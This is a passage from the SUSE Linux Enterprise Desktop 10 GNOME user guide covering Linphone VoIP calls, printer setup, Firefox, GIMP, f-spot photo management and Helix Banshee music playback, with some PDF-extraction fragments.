Check your Linphone configuration using sipomatic, a small test program that can answer calls made from Linphone. Testing a Linphone Setup 1 Open a terminal. 2 Enter sipomatic at the command line prompt. 3 Start Linphone. 4 Enter sip:[email protected]:5064 as SIP address and click Call or Answer. 5 If Linphone is configured correctly, you will hear a phone ringing and, after a short while, you will hear a short announcement. If you successfully completed this procedure, you can be sure that your audio setup and the network setup are working. If this test fails, check whether your sound device is correctly configured and whether the playback level is set to a reasonable value. If you still fail to hear anything, check the network setup including the port numbers for SIP and RTP. If any other application or protocol uses the defaults ports for these as proposed by Linphone, consider changing ports and retry.
7.3 Making a Call
Once Linphone is configured appropriately, making a call is straightforward. Depending on the type of call (see “Determining the Connection Type” on page 113 for reference), the calling procedures differ slightly. 1 Start Linphone using the menu or a command line. 2 Enter the SIP address of the other party at the SIP address prompt. The address should look like sip:username@domainname or username@hostname for direct local calls or like username@sipserver or userid@sipserver for proxied calls or calls using the service of a SIP provider.
116 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
3 If using a SIP service provider or a proxy, select the appropriate proxy or provider from Proxy to use and provide the authentication data requested by this proxy. 4 Click Call or Answer and wait for the other party to pick up the phone. 5 Once you are done or wish to end the call, click Release or Refuse and leave Linphone. If you need to tweak the sound parameters during a call, click Show more to show four tabs holding more options. The first one holds the Sound options for Playback level and Recording level. Use the sliders to adjust both volumes to fit your needs. The Presence tab lets you set your online status. This information can be relayed to anyone who tries to contact you. If you are permanently away and wish to inform the calling party of this fact, just check Away. If you are just busy, but want the calling party to retry, check Busy, I'll be back in ... min and specify how long you will not be reachable. Once you are reachable again, set the status back to the default (Reachable). Whether another party can check your online status is determined by the Subscribe Policy set in the address book, as described in “Using the Address Book” on page 117. If any party listed in your address book published their online status, you can monitor it using the My online friends tab. The DTMF tab can be used to enter DTMF codes for checking voice mail. To check your voice mail, enter the appropriate SIP address and use the keypad in the DTMF tab to enter the voice mail code. Finally, click Call or Answer as if you were making an ordinary call.
7.4 Answering a Call
Depending on the run mode selected for Linphone, there are several ways you would notice an incoming call: Normal Application Incoming calls can only be received and answered if Linphone is already running. You then hear the ring sound on your headset or your speakers. If Linphone is not running, the call cannot be received. GNOME Panel Applet Normally, the Linphone panel applet would run silently without giving any notice of its existence. This changes as soon as a call comes in: the main window of Linphone opens and you hear a ring sound on your headset or speakers. Once you have noticed an incoming call, just click Call or Answer to pick up the phone and start talking. If you do not want to accept this call, click Release of Refuse.
7.5 Using the Address Book
Linphone offers to manage your SIP contacts. Start the address book with Go > Address book. An empty list window opens. Click Add to add a contact. The following entries need to be made for a valid contact: Name Enter the name of your contact. This may be a full name, but you can also use a nickname here. Choose something you easily remember this person as. If you choose to see this person's online status, this name is shown in the My online friends tab of the main window.
Using Voice over IP 117
novdocx (ENU) 01 February 2006
SIP Address Enter a valid SIP address for your contact. Proxy to Use If needed, enter the proxy to use for this particular connection. In most cases, this would just be the SIP address of the SIP server you use. Subscribe Policy Your subscribe policy determines whether your presence or absence can be tracked by others. To call any contact from the address book, select this contact with the mouse, click Select to make the address appear in the address field of the main window, and start the call with Call or Answer as usual.
7.6 Troubleshooting
I try to call someone, but fail to establish a connection. There are several reasons why a call could fail: Your connection to the Internet is broken. Because Liphone uses the Internet to relay your calls, make sure that your computer is properly connected to and configured for the Internet. This can easily be tested by trying to view a Web page using your browser. If the Internet connection works, the other party might not be reachable. The person you are calling is not reachable. If the other party refused your call, you would not be connected. If Linphone is not running on the other party's machine while you are calling, you will not be connected. If the other party's Internet connection is broken, you cannot make the connection. My call seems to connect, but I cannot hear anything. First, make sure that your sound device is properly configured. Do this by launching any other application using sound output, such as a media player. Make sure that Linphone has sufficient permissions to open this device. Close all other programs using the sound device to avoid resource conflicts. If the above checks were successful, but you still fail to hear anything, raise the recording and playback levels under the Sound tab. The voice output on both ends sounds strangely clipped. Try to adjust the jitter buffer using RTP properties in Preferences > Network to compensate for delayed voice packages. When doing this, be aware that it increases the latency. DTMF does not work. You tried to check your voice mail using the DTMF pad, but the connection could not be established. There are three different protocols used for the transmission of DTMF data, but only two of these are supported by Linphone (SIP INFO and RTP rfc2833). Check with your provider whether it supports one of these. The default protocol used by Linphone is rfc2833, but if that fails you can set the protocol to SIP INFO in Preferences > Network > Other. If it does not work with either of them, DTMF transmission cannot be done using Linphone.
118 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
7.7 Glossary
Find some brief explanation of the most important technical terms and protocols mentioned in this document: VoIP VoIP stands for voice over Internet protocol. This technology allows the transmission of ordinary telephone calls over the Internet using packet-linked routes. The voice information is sent in discrete packets like any other data transmitted over the Internet via IP. SIP SIP stands for session initiation protocol. This protocol is used to establish media sessions over networks. In a Linphone context, SIP is the magic that triggers the ring at your counterpart's machine, starts the call, and also terminates it as soon as one of the partners decides to hang up. The actual transmission of voice data is handled by RTP. RTP RTP stands for real-time transport protocol. It allows the transport of media streams over networks and works over UDP. The data is transmitted by means of discrete packets that are numbered and carry a time stamp to allow correct sequencing and the detection of lost packages. DTMF A DTMF encoder, like a regular telephone, uses pairs of tones to represent the various keys. Each key is associated with a unique combination of one high and one low tone. A decoder then translates these touch-tone combinations back into numbers. Linphone supports DTMF signalling to trigger remote actions, such as checking voice mail. codec Codecs are algorithms specially designed to compress audio and video data. jitter Jitter is the variance of latency (delay) in a connection. Audio devices or connection-oriented systems, like ISDN or PSTN, need a continuous stream of data. To compensate for this, VoIP terminals and gateways implement a jitter buffer that collect the packets before relaying them onto their audio devices or connection-oriented lines (like ISDN). Increasing the size of the jitter buffer decreases the likelihood of data being missed, but the latency of the connection is increased.
7.8 For More Information
For general information about VoIP, check the VoIP Wiki at voip-info.org (). For a comprehensive list of providers offering VoIP services in your home country, refer to the service providers list at voip-info.org ().
Using Voice over IP 119
novdocx (ENU) 01 February 2006
120 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
8
Managing Printers
SUSE® Linux Enterprise Desktop (SLED) makes it easy to print your documents, whether your computer is connected directly to a printer or linked remotely on a network. This chapter describes how to set up printers in SLED and manage print jobs with the following tasks: • “Installing a Printer” on page 121 • “Modifying Printer Settings” on page 122 • “Canceling Print Jobs” on page 122 • “Deleting a Printer” on page 122
8
8.1 Installing a Printer
Before you can install a printer, you need to know the root password and have your printer information ready. Depending on how you connect to the printer, you might also need the printer URI, TCP/IP address or host, and the driver for the printer. A number of common printer drivers ship with SLED. If you cannot find a driver for the printer, check the printer manufacturer's Web site.
8.1.1 Installing a Network Printer
1 Click Computer > Control Center > Add Printer > New Printer. 2 Enter the root password. 3 Click Network Printer, then select the type of connection for this printer. CUPS Printer (IPP): A printer attached to a different Linux system on the same network running CUPS or a printer configured on another operating system to use IPP. Windows Printer (SMB): A printer attached to a different system which is sharing a printer over a SMB network (for example, a printer attached to a Microsoft Windows machine). UNIX Printer (LPD): A printer attached to a different UNIX system that can be accessed over a TCP/IP network (for example, a printer attached to another Linux system on your network). HP JetDirect: A printer connected directly to the network instead of to a computer. 4 Specify the printer's information, then click Forward. 5 Select the printer driver for this printer, then click Apply. You can also install a printer driver from a disk, or visit the printer manufacturer's Web site to download the latest driver. 6 Specify desired options (such as a description or location) for the printer in the Properties dialog box, then click Close. The installed printer appears in the Printers panel. You can now print to the printer from any application.
8.1.2 Installing a Local Printer
1 Connect the printer cable to your computer and connect the printer's power supply.
Managing Printers 121
novdocx (ENU) 01 February 2006
The printer dialog should open. If it doesn’t, click Computer > Control Center > Add Printer > New Printer to open it. 2 Enter the root password. 3 Click Local Printer. 4 If the printer was autodetected, select the printer from the list. If the printer was not autodetected, click Use another printer by specifying a port and then select the correct printer port. 5 Click Forward. 6 Select the printer driver for this printer, then click Apply. You can also install a printer driver from a disk, or visit the printer manufacturer's Web site to download the latest driver. 7 Specify desired options (such as a description or location) for the printer in the Properties dialog box, then click Close. The installed printer appears in the Printers dialog box. You can now print to the printer from any application.
8.2 Modifying Printer Settings
1 Click Computer > Control Center > Printers. 2 Right-click the printer you want to modify, then click Properties. 3 Modify the properties, then click Close.
8.3 Canceling Print Jobs
1 Click Computer > Control Center > Printer. 2 Double-click the printer you sent the job to. 3 Right-click the print job, then click Cancel. If the print job does not appear in the list, then the print job might have been printed already.
8.4 Deleting a Printer
1 Click Computer > Control Center > Printer. 2 Click Edit > Become Administrator. 3 Type the root password, then click Continue. 4 Right-click the printer you want to delete, then click Remove.
122 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
I
Internet
Internet 123
III
novdocx (ENU) 01 February 2006
124 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
9
Browsing with Firefox
9
Included with your SUSE® Linux Enterprise Desktop.
9.1 Navigating Web Sites
Firefox has much the same look and feel as other browsers. It is shown in Figure 9-1 on page 125. The navigation toolbar includes Forward and Back and a location bar for a Web address. Bookmarks are also available for quick access. For more information about the various Firefox features, use the Help menu.
Figure 9-1 The Browser Window of Firefox
Browsing with Firefox 125
novdocx (ENU) 01 February 2006
9.1.1 Tabbed Browsing
If you often use more than one Web page at a time, tabbed browsing may make it easier to switch between them. Load Web sites in separate tabs within one window. To open a new tab, select File > New Tab. This opens an empty tab in the Firefox window. Alternatively, right-click a link and select Open link in new tab. Right-click the tab itself to access more tab options. You can create a new tab, reload one or all existing tabs, or close them. You can also change the sequence of the tabs by dragging and dropping them on a requested position.
9.1.2 Using the Sidebar
Use the left side of your browser window for viewing bookmarks or the browsing history. Extensions may add new ways to use the sidebar as well. To display the Sidebar, select View > Sidebar and select the desired contents.
9.2 Finding Information
There are two ways to find information in Firefox: the search bar and the find bar. The search bar looks for pages while the find bar looks for things on the current page.
9.2.1 Finding Information on the Web
Firefox has a search bar that can access different engines, like Google, Yahoo, or Amazon. For example, if you want to find information about SUSE using the current engine, click in the search bar, type SUSE, and hit Enter. The results appear in your window. To choose your search engine, click the icon in the search bar. A menu opens with a list of available search engines.
9.2.2 Installing a Different Search Engine
If you favorite search engine is not listed, Firefox gives you the possibility to configure it. Try the following steps: 1 Establish an Internet connection first. 2 Click in the search bar on the icon. 3 Select Add Engines from the menu. 4 Firefox displays a Web page with available search engines. It is also sorted by categories. You can choose from Wikipdedia, Leo, and others. Click the desired search plug-in. 5 Install your search plug-in with Ok or abort with Cancel.
9.2.3 Searching in the Current Page
To search inside a Web page, click Edit > Find in This Page or press CtrlF. The find bar opens. Usually, it is displayed at the bottom of a window. Type your query in the input field. Firefox finds the first occurence of this phrase. You can find other occurences of the phrase by pressing F3 or Find Next button in the find bar. You can also highlight all occurences by pressing the Highlight all button.
126 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
9.3 Managing Bookmarks
Bookmarks offer a convenient way of saving links to your favorite Web sites. To add the current Web site to your list of bookmarks, click Bookmarks > Bookmark This Page. If your browser currently displays multiple Web sites on tabs, only the URL on the currently selected tab is added to your list of bookmarks. When adding a bookmark, you can specify an alternative name for the bookmark and select a folder where Firefox should store it. To bookmark Web sites on multiple tabs, select Bookmark All Tabs. Firefox creates a new folder that includes bookmarks of each site displayed on each tab. To remove a Web site from the bookmarks list, click Bookmarks, right-click the bookmark in the list, then click Delete.
9.3.1 Using the Bookmark Manager
The bookmark manager can be used to manage the properties (name and address location) for each bookmark and organize the bookmarks into folders and sections. It resembles Figure 9-2 on page 127.
Figure 9-2 Using the Firefox Bookmark Manager
To open the bookmark manager, click Bookmark > Manage Bookmarks. A window opens and displays your bookmarks. With New Folder, create a new folder with a name and a description. If you need a new bookmark, click New Bookmark. This lets you insert the name, location, keywords, and also a description. The keyword is a shortcut to your bookmark. If you need your newly created bookmark in the sidebar, check Load this bookmark in the sidebar.
Browsing with Firefox 127
novdocx (ENU) 01 February 2006
9.3.2 Importing Bookmarks from Other Browsers
If you used a different browser in the past, you probably want to use your preferences and bookmarks in Firefox, too. At the moment, you can import from Netscape 4.x, 6, 7, Mozilla 1.x, and Opera. To import your settings, click File > Import. Select the browser from which to import settings. After you click Next, your settings are imported. Find your imported bookmarks in a newly created folder, beginning with From.
9.3.3 Live Bookmarks
Live bookmarks display headlines in your bookmark menu and keep you up to date with the latest news. This enables you to save time with one glance at your favorite sites. Many sites and blogs support this format. A Web site indicates this by showing an orange icon in the right part of the location bar. Click it and choose Add NAME OF THE FEED as Live Bookmark. A dialog box opens where you can select the name and location of your live bookmark. Confirm with Add. Some sites do not tell Firefox that they support a news feed, although they actually do. To add a live bookmark manually, you need the URL of the feed. Do the following: Adding a Live Bookmark Manually 1 Open the bookmark manager with Bookmarks > Manage Bookmarks. A new window opens. 2 Select File > New Live Bookmark. A dialog box opens. 3 Insert a name for the live bookmark and add your URL, for example, http://. Firefox updates your live bookmarks. 4 Close your bookmark manager.
9.4 Using the Download Manager
With the help of the download manager, keep track of your current and past downloads. To open the download manager, click Tools > Downloads. Firefox opens a window with your downloads. While downloading a file, see a progress bar and the current file. If necessary, pause a download and resume it later. To open a downloaded file, click Open. With Remove, remove it from the list. If you need information about the file, right-click the filename and choose Properties. If you need further control of the download manager, open the configuration window from Edit > Preferences and go to the Downloads tab. Here, determine the download folder, how the manager behaves, and some configuration of file types.
9.5 Customizing Firefox
Firefox can be customized extensively. You can install extensions, change themes, and add smart keywords for your online searches.
128 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
9.5.1 Extensions
Mozilla Firefox is a multifunctional application, which means that you can download and install add-ons, known as extensions. For example, add a new download manager and mouse gestures. This has the advantage that Firefox itself stays small and unbloated. To add an extension, click Tools > Extensions. In the bottom-right corner, click Get More Extensions to open the Mozilla extensions update Web page where you can choose from a variety of available extensions. Click the extension to install then click the install link to download and install it. When you restart Firefox, the new extension is functional. You can also look at the various extensions at addons.mozilla.org ().
Figure 9-3 Installing Firefox Extensions
9.5.2 Changing Themes
If you do not like the standard look and feel of Firefox, install a new theme. Themes do not change the functionality, only the appearance of the browser. When installing a theme, Firefox asks for confirmation first. Allow the installation or cancel it. After a successful installation, you can enable the new theme. 1 Click Tools > Themes.
Browsing with Firefox 129
novdocx (ENU) 01 February 2006
2 In the new dialog that appears, click Get More Themes. If you already installed a theme, find it in the list, as in Figure 9-4 on page 130.
Figure 9-4 Installing Firefox Themes
3 A new window appears with the Web site addons.mozilla.org (). 4 Choose a theme and click Install Now. 5 Confirm the download and installation. 6 After downloading the theme, a dialog appears and informs you about your list of themes. Activate the new theme with Use Theme. 7 Close the window and restart Firefox. If a theme is installed, you can always switch to a different theme without restarting by clicking Tools > Themes then Use Theme. If you do not use a theme anymore, you can delete it in the same dialog with Uninstall.
9.5.3 Adding Smart Keywords to Your Online Searches
Searching the Internet is one of the main tasks a browser can perform for you. Firefox lets you define your own smart keywords: abbreviations to use as a “command” for searching the Web. For example, if you use Wikipedia often, use a smart keyword to simplify this task: 1 Go to Wikipedia (). 2 After Firefox displays the Web page, see the search text field. Right-click it then choose Add a Keyword for this Search from the menu that opens. 3 The Add Bookmark dialog appears. In Name, name this Web page, for example, Wikipedia (en). 4 For Keyword, enter your abbreviation of this Web page, for example, wiki. 5 With Create in, choose the location of the entry in your bookmarks section. You can put it into Quick Searches, but any other level is also appropriate. 6 Finalize with Add. You have successfully generated a new keyword. Whenever you need to look into Wikipedia, you do not have to use the entire URL. Just type wiki Linux to view an entry about Linux.
130 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
9.6 Printing from Firefox
Configure the way Firefox prints the content it displays using the Page Setup dialog. Click File > Page Setup then go to the Format & Options tab to select the orientation of your print jobs. You can scale or make it adjust automatically. To print a background, select Print Background (colors & images). Click the Margins & Header/Footer tab to adjust margins and select what to include in the headers and footers. After you configured your settings, print a Web page with File > Print. Select the printer or a file in which to save the output. With Properties, set the paper size, specify the print command, choose grayscale or color, and determine the margins. When satisfied with your settings, approve with Print.
9.7 For More Information
Get more information about Firefox from the official home page at (). Refer to the integrated help to find out more about certain options or features.
Browsing with Firefox 131
novdocx (ENU) 01 February 2006
132 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
IV
Multimedia
Multimedia 133
IV
novdocx (ENU) 01 February 2006
134 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Manipulating Graphics with The GIMP
10
10
The “For More Information” on page 139 for ideas of where to find more information about the program.
10.1 Graphics Formats
There are two main formats for graphics—pixel and vector. The GIMP works only with pixel graphics, which is the normal format for photographs and scanned images. Pixel graphics consist of small blocks of color that together create the entire image. The files can easily become quite large because of this. It is also not possible to increase the size of a pixel image without losing quality. Unlike pixel graphics, vector graphics do not store information for all individual pixels. Instead, they store information about how image points, lines, or areas are grouped together. Vector images can also be scaled very easily. The drawing application of OpenOffice.org, for example, uses this format.
10.2 Starting GIMP
Start GIMP from the main menu. Alternatively, enter gimp & in a command line.
10.2.1 Initial Configuration
When starting GIMP for the first time, a configuration wizard opens for preparatory configuration. The default settings are acceptable for most purposes. Press Continue in each dialog unless you are familiar with the settings and prefer another setup.
10.2.2 The Default Windows
Three windows appear by default. They can be arranged on the screen and, except the toolbox, closed if no longer needed. Closing the toolbox closes the application. In the default configuration, GIMP saves your window layout when you exit. Dialogs left open reappear when you next start the program.
Manipulating Graphics with The GIMP 135
novdocx (ENU) 01 February 2006
The Toolbox The main window of GIMP, shown in “The Main Window” on page 136, contains the main controls of the application. Closing it exits the application. At the very top, the menu bar offers access to file functions, extensions, and help. Below that, find icons for the various tools. Hover the mouse over an icon to display information about it.
Figure 10-1 The Main Window
The current foreground and background color are shown in two overlapping boxes. The default colors are black for the foreground and white for the background. Click the box to open a color selection dialog. Swap the foreground and background color with the bent arrow symbol to the upper right of the boxes. Use the black and white symbol to the lower left to reset the colors to the default. To the right, the current brush, pattern, and gradient are shown. Click the displayed one to access the selection dialog. The lower portion of the window allows configuration of various options for the current tool. Layers, Channels, Paths, Undo In the first section, use the drop-down box to select the image to which the tabs refer. By clicking Auto, control whether the active image is chosen automatically. By default, Auto is enabled. Layers shows the different layers in the current images and can be used to manipulate the layers. Channels shows and can manipulate the color channels of the image. Paths are a vector-based method of selecting parts of an image. They can also be used for drawing. Paths shows the paths available for an image and provides access to path functions. Undo shows a limited history of modifications made to the current image.
10.3 Getting Started in GIMP
Although GIMP can be a bit overwhelming for new users, most quickly find it easy to use once they work out a few basics. Crucial basic functions are creating, opening, and saving images.
10.3.1 Creating a New Image
To create a new image, select File > New or press Ctrl+N. This opens a dialog in which to make settings for the new image. If desired, select a predefined setting called a Template. To create a custom template, select File > Dialogs > Templates and use the controls offered by the window that opens. In the Image Size section, set the size of the image to create in pixels or another unit. Click the unit to select another unit from the list of available units. The ratio between pixels and a unit is set in
136 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Resolution, which appears when the Advanced Options section is open. A resolution of 72 pixels per inch corresponds to screen display. It is sufficient for Web page graphics. A higher resolution should be used for images to print. For most printers, a resolution of 300 pixels per inch results in an acceptable quality. In Colorspace, select whether the image should be in color (RGB) or Grayscale. Select the Fill Type for the new image. Foreground Color and Background Color use the colors selected in the toolbox. White uses a white background in the image. Transparent creates a clear image. Transparency is represented by a gray checkerboard pattern. Enter a comment for the new image in Comment. When the settings meet your needs, press OK. To restore the default settings, click Reset. Clicking Cancel aborts creation of a new image.
10.3.2 Opening an Existing Image
To open an existing image, select File > Open or press Ctrl+O. In the dialog that opens, select the desired file. You can also press CtrlL and type directly the URI of the desired image. Then click OK to open the selected image or press Cancel to skip opening an image.
10.3.3 Scanning an Image
Instead of opening an existing image or creating a new one, you can scan one. To scan directly from the GIMP, make sure that the package xsane is installed. To open the scanning dialog, select File > Acquire > XSane: scanning device. Create a preview when the object to scan is smaller than the total scanning area. Press Acquire preview in the Preview dialog to create a preview. If you want to scan only part of the area, select the desired rectangular part with the mouse. In the xsane dialog, select whether to scan a grayscale or color image and the required scan resolution. The higher the resolution, the better the quality of the scanned image is. However, this also results in a correspondingly larger file and the scanning process can take a very long time at higher resolutions. The size of the final image (both in pixels and bytes) is shown in the lower part of the dialog. In the xsane dialog, use the sliders to set desired gamma, brightness, and contrast values. Changes are visible in the preview immediately. Once all settings have been made, click Scan to scan the image.
10.3.4 The Image Window
The new, opened, or scanned image appears in its own window. The menu bar in the top of the window provides access to all image functions. Alternatively, access the menu by right-clicking the image or clicking the small arrow button in the left corner of the rulers. File offers the standard file options, such as Save and Print. Close closes the current image. Quit closes the entire application. With the items in the View menu, control the display of the image and the image window. New View opens a second display window of the current image. Changes made in one view are reflected in all other views of that image. Alternate views are useful for magnifying a part of an image for manipulation while seeing the complete image in another view. Adjust the magnification level of the
Manipulating Graphics with The GIMP 137
novdocx (ENU) 01 February 2006
current window with Zoom. When Shrink Wrap is selected, the image window is resized to fit the current image display exactly.
10.4 Saving Images
No image function is as important as File > Save. It is better to save too often than too rarely. Use File > Save as to save the image with a new filename. It is a good idea to save image stages under different names or make backups in another directory so you can easily restore a previous state. When saving for the first time or using Save as, a dialog opens in which to specify the filename and type. Enter the filename in the field at the top. For Save in folder, select the directory in which to save the file from a list of commonly used directories. To use a different directory or create a new one, open Browse for other folders. It is recommended to leave Select File Type set to By Extension. With that setting, GIMP determines the file type based on the extension appended to the filename. The following file types are frequently useful: XCF This is the native format of the application. It saves all layer and path information along with the image itself. Even if you need an image in another format, it is usually a good idea to save a copy as XCF to simplify future modifications. PAT This is the format used for GIMP patterns. Saving an image in this format enables using the image as a fill pattern in GIMP. JPG JPG or JPEG is a common format for photographs and Web page graphics without transparency. Its compression method enables reduction of file sizes, but information is lost when compressing. It may be a good idea to use the preview option when adjusting the compression level. Levels of 85% to 75% often result in an acceptable image quality with reasonable compression. Saving a backup in a lossless format, like XCF, is also recommended. If editing an image, save only the finished image as JPG. Repeatedly loading a JPG then saving can quickly result in poor image quality. GIF Although very popular in the past for graphics with transparency, GIF is less often used now because of license issues. GIF is also used for animated images. The format can only save indexed images. The file size can often be quite small if only a few colors are used. PNG With its support for transparency, lossless compression, free availability, and increasing browser support, PNG is replacing GIF as the preferred format for Web graphics with transparency. An added advantage is that PNG offers partial transparency, which is not offered by GIF. This enables smoother transitions from colored areas to transparent areas (antialiasing). To save the image in the chosen format, press Save. To abort, press Cancel. If the image has features that cannot be saved in the chosen format, a dialog appears with choices for resolving the situation. Choosing Export, if offered, normally gives the desired results. A window then opens with the options of the format. Reasonable default values are provided.
138 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
10.5 Printing Images
To print an image, select File > Print from the image menu. If your printer is configured in the system, it should appear in the list. In some cases, it may be necessary to select an appropriate driver with Setup Printer. Select the appropriate paper size with Media Size and the type in Media Type. Other settings are available in the Image / Output Settings tab.
Figure 10-2 The Print Dialog
In the bottom portion of the window, adjust the image size. Press Use Original Image Size to take these settings from the image itself. This is recommended if you set an appropriate print size and resolution in the image. Adjust the image's position on the page with the fields in Position or by dragging the image in Preview. When satisfied with the settings, press Print. To save the settings for future use, instead use Print and Save Settings. Cancel aborts printing.
10.6 For More Information
The following resources are useful for a GIMP user, even if some of them apply to older versions. • Help provides access to the internal help system. This documentation is also available in HTML and PDF formats at gimp.org (). • The GIMP User Group offers an informative Web site at sunsite.dk (). • gimp.org () is the official home page of The GIMP.
Manipulating Graphics with The GIMP 139
novdocx (ENU) 01 February 2006
• Grokking the GIMP by Carey Bunks is an excellent book based on an older GIMP version. Although some aspects of the program have changed, it can provide excellent guidance for image manipulation. An online version is available at gimp-savvy.com ().
140 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
1
Using Digital Cameras with Linux
11
f. TIP:
Using Digital Cameras with Linux 141
novdocx (ENU) 01 February 2006) Browse
Use this shortcut to change an image's orientation. The Browse mode allows you to view and search you entire collection or tagged subsets of it. You can also use the time line to search images by creation date. This mode allows you to select one image and do some basic image processing. Details are available in Section 11.6, “Basic Image Processing with f-spot,” on page 146. Switch to fullscreen display mode. Start a slide show.
Edit Image
Fullscreen Slideshow
142 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
11.1 Downloading Pictures from Your Camera
Import new images from your digital camera connected to the USB port of your computer using File > Import from Camera. The type of camera is detected automatically.
Figure 11-3 Import from Camera
f-spot launches a preview window displaying all the images that are available for download from camera. The files are copied to the target directory specified via Copy Files to. If Import files after copy is selected, all images copied from camera are automatically imported to f-spot's database. Tagging can be done on import, if you select the appropriate tag with Select Tags. If you do not want to import all images on your camera to your database, just deselect the unwanted one in the preview window.
11.2 Getting Information
Once you select an image, some basic statistical information on this image is displayed in the lower left part of the window. This includes the filename, its version (copy or original image), the date of creation, its size and the exposure which was used in creating this particular image. View the EXIF data associated with the image file with View > EXIF Data.
Using Digital Cameras with Linux 143
novdocx (ENU) 01 February 2006
11.3 Managing Tags
Use tags to categorize any of your images to create manageable subsets of your collection. If, for example, you would like to get some sort of order in your collection of portrait shots of your loved ones, proceed like this: 1 Select the Browse mode of f-spot. 2 In the left frame of the f-spot window, select the People category, right-click it, then choose Create New Tag. The new tags then appear as subcategories below the People category: 2a Create a new tag called Friends. 2b Create a new tag called Family. 3 Now attach tags to images or groups of selected images. Right-click an image, choose Attach Tag, and select the appropriate tag for this image. To attach a tag to a group of images, click the first one then press Shift and select the other ones without releasing the Shift key. Right-click for the tag menu and select the matching category. After the images have been categorized, you can browse your collection by tag. Just check People > Family and the displayed collection is limited to the images tagged Family. Searching your collection by tag is also possible through Find > Find by Tag. The result of your search is displayed in the thumbnail overview window. Removing tags from single images or groups of images works similarly to attaching them. The tag editing functions are also accessible via the Tags menu in the top menu bar.
11.4 Search and Find
As mentioned in Section 11.3, “Managing Tags,” on page 144, tags can be used as a means to find certain images. Another way, which is quite unique to f-spot, is to use the Timeline below the toolbar. By dragging the little frame along this time line, limit the images displayed in the thumbnail overview to those taken in the selected time frame. f-spot starts with a sensibly chosen default time line, but you can always edit the time span by moving the sliders to the right and left ends of the time line.
11.5 Exporting Image Collections
f-spot offers a range of different export functions for your collections under File > Export. Probably the most often used of these are Export to Web Gallery and Export to CD. To export a selection of images to a web gallery, proceed as follows: 1 Select the images to export. 2 Click File > Export > Export to Web Gallery and select a gallery to which to export your images or add a new one. f-spot establishes a connection to the Web location entered for your web gallery. Select the album to which to export the images and decide whether to scale the images automatically and export titles and comments.
144 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Figure 11-4 Exporting Images to a Web Gallery
To export a selection of images to CD, proceed as follows: 1 Select the images to export. 2 Click File > Export > Export to CD and click OK. f-spot copies the files and opens the CD writing dialog. Assign a name to your image disk and determine the writing speed. Click Write to start the CD writing process.
Figure 11-5 Exporting Images to a CD
Using Digital Cameras with Linux 145
novdocx (ENU) 01 February 2006
11.6 Basic Image Processing with f-spot
f-spot offers several very basic image editing functionalities. Enter the edit mode of f-spot by clicking the Edit Image icon in the toolbar or by double-clicking the image to edit. Switch images using the arrow keys at the bottom right. Choose from the following edit functions:
Table 11-2 f-spot Edit Functions
Function
Description
Sharpen
Access this function with Edit > Sharpen. Adjust the values for Amount, Radius, and Threshold to your needs and click OK. To crop the image to a selection you made, either choose a fixed ratio crop or the No Constraint option from the drop-down menu at the bottom left, select the region to crop, and click the scissor icon next to the ratio menu. In a portrait shot, select the eye region of the face and click the red eye icon. View the histogram used in the creation of the shot and correct exposure and color temperature if necessary.
Crop Image
Red Eye Reduction Adjust Color
TIP: Professional image editing can be done with the GIMP. More information about The GIMP can be found in Chapter 10, “Manipulating Graphics with The GIMP,” on page 135.
146 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Playing and Managing Your Music with Helix Banshee
12
12
Hel
Playing and Managing Your Music with Helix Banshee 147
novdocx (ENU) 01 February 2006
12.1 Managing Your Library
You can use the library to do a variety of things, including playing, organizing, and importing music. You can also view a variety of information about your music collection, including playback statistics (when a song was last played and how many times).
12.1.1 Playing Your Music
To play a song, simply select the song in the library and click the Play button ( ). Use the buttons on the upper left corner ( ) to pause a song or play the next or previous song. Use to adjust the volume. You can also use the items on the Playback menu to repeat or shuffle songs. Helix Banshee also has an integrated CD player. When you insert a music CD, your CD title appears in the left panel. Select the title and click the Play button to play your full CD.
12.1.2 Organizing Your Music
To create a new playlist, click Music > New Playlist (or press Ctrl+N). A new playlist is displayed in the left panel. Double-click New Playlist and enter the name you want. You can drag and drop songs from one playlist to another, or use the options on the Edit menu to remove or delete songs and rename or delete playlists. You can edit the name of the artist, album, and title, as well as the track number and track count. Simply select a song, then click Edit > Edit Song Metadata. If you want to set all fields in a set to the same value, select multiple songs in a playlist, then click Edit > Edit Song Metadata.
Figure 12-3 Editing Song Dialog Box
12.1.3 Importing Music
Helix Banshee can import music from a file, folder, or CD. Click Music > Import Music, choose an import source, then click Import Music Source. To rip music from a CD to your music collection, click the Rip button near the top right.
148 SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
12.2 Using Helix Banshee with Your iPod
To play music from your iPod, simply plug your iPod into you system. Your iPod appears in the left panel. Select the song you want to hear, then click the Play button.
Figure 12-4 iPod List in Helix Banshee
When the iPod is selected in the left panel, information about your iPod is displayed at the bottom left, including disk usage and Sync, Properties, and Eject buttons.
Figure 12-5 iPod Buttons in Helix Banshee
There are three ways to manage the music on your iPod: • Manually: Browse your iPod and drag music between your library and the iPod. • Automatically sync: Automatically copies everything in your library to the iPod. • Automatic merge: All the music on your iPod that is not in your library is downloaded to your library, and all the music that is in your library and not in your iPod is uploaded to your iPod.
Playing and Managing Your Music with Helix Banshee 149
novdocx (ENU) 01 February 2006
